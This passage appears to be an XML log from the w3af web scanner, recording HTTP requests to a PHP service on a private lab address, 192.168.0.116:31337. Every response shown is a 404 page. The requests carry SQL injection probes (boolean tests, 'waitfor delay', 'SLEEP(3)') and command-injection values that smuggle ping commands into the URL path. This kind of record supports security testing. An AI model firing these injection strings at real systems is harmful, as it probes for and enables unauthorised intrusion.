                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="764">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="790">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%22+AND+%2279%22%3D%2280 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="814">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%27+OR+%2779%27%3D%2779 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="815">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/oRls4hxT HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="820">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="828">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%27+AND+%2779%27%3D%2780 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="844">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/Ttkp9dW5 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="845">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79+OR+79%3D79+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="847">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="852">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/qmwen%3C%2F-%3Eqmwen%2F%2Aqmwen%22qmwenqmwen%27qmwenqmwen%60qmwenqmwen+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="855">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79+AND+79%3D80+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="863">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/YFCzCZoJ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="868">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="882">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="900">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="913">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="929">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="936">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="945">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
